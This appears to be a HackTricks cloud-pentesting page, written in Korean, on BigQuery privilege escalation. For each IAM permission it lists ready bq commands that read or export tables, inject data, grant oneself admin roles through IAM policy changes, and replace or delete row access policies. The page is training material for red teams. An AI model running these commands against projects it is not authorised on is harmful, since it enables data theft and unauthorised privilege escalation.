GCP - BigQuery Privesc

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

BigQuery

BigQuery에 대한 자세한 정보는 다음을 확인하세요:

GCP - Bigquery Enum

테이블 읽기

BigQuery 테이블에 저장된 정보를 읽으면 민감한 정보를 찾을 수 있습니다. 해당 정보에 접근하려면 필요한 권한은 bigquery.tables.get, bigquery.jobs.createbigquery.tables.getData 입니다:

BigQuery 테이블 데이터 읽기 ```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

데이터 내보내기

이것은 데이터를 접근하는 또 다른 방법입니다. Cloud Storage 버킷으로 내보내고 정보가 포함된 파일을 다운로드하세요. 이 작업을 수행하려면 다음 권한이 필요합니다: bigquery.tables.export, bigquery.jobs.createstorage.objects.create.

BigQuery 테이블을 Cloud Storage로 내보내기 ```bash bq extract .
"gs:///table*.csv" ```

데이터 삽입

Bigquery 테이블에 특정 신뢰된 데이터를 주입하여 다른 곳의 취약점을 악용할 수 있습니다. 이는 권한 bigquery.tables.get, bigquery.tables.updateData 및 **bigquery.jobs.create**로 쉽게 수행할 수 있습니다:

BigQuery 테이블에 데이터 삽입 ```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

공격자는 이 권한을 악용해 BigQuery 데이터셋에 대해 **자신에게 추가 권한을 부여할 수 있습니다**:

<details>
<summary>BigQuery 데이터셋에 대한 IAM 정책 설정</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

이 권한만으로도 누가 접근할 수 있는지를 나타내는 ACLs를 수정해 BigQuery dataset에 대한 접근 권한을 업데이트할 수 있습니다:

BigQuery dataset ACLs 수정 ```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.
```

bigquery.tables.setIamPolicy

공격자는 이 권한을 악용하여 BigQuery 테이블에 대해 자신에게 추가 권한을 부여할 수 있습니다:

BigQuery 테이블에 대한 IAM 정책 설정 ```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

문서에 따르면, 언급된 권한으로 **row access policy를 업데이트할 수 있습니다.**\
하지만, **cli `bq`를 사용할 때는** 추가로 다음 권한들이 필요합니다: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

<details>
<summary>Create or replace row access policy</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

filter ID는 row policies enumeration의 출력에서 찾을 수 있습니다. 예:

List row access policies ```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time


apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

만약 **`bigquery.rowAccessPolicies.delete`** 권한이 `bigquery.rowAccessPolicies.update` 대신 있다면 정책을 그냥 삭제할 수도 있습니다:

<details>
<summary>행 액세스 정책 삭제</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

행 수준 액세스 정책을 우회할 수 있는 또 다른 방법은 제한된 데이터의 값을 단순히 변경하는 것입니다. 예를 들어 termCfba일 때만 볼 수 있다면, 테이블의 모든 레코드를 term = "Cfba"로 수정하면 됩니다. 그러나 이는 bigquery에 의해 차단됩니다.

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기